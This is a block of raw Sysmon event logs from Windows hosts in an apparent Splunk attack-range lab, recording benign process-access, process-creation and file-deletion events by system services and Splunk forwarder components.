12:31:32.173{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.173{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.173{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E6A4-63C7-A806-00000000AF02}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.173{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E6A4-63C7-A806-00000000AF02}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.175{FE4C2B44-E6A4-63C7-A806-00000000AF02}7928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000048857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.173{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F76BB58EEDCC4A7D5218B7158CDBF358,SHA256=887459C133B3060DEC9E2EF0707052896C0BA69213D43A33AE36FC4ADD626BB2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:32.145{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000019137Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E6A4-63C7-4802-00000000B002}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019136Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019135Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019134Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019133Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019132Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019131Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019130Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019129Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019128Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019127Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E6A4-63C7-4802-00000000B002}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019126Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.849{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E6A4-63C7-4802-00000000B002}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019125Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.850{E5A8D418-E6A4-63C7-4802-00000000B002}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019124Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.599{E5A8D418-E6A4-63C7-4702-00000000B002}3680228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019123Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E6A4-63C7-4702-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019122Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019121Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019120Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019119Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019118Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019117Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 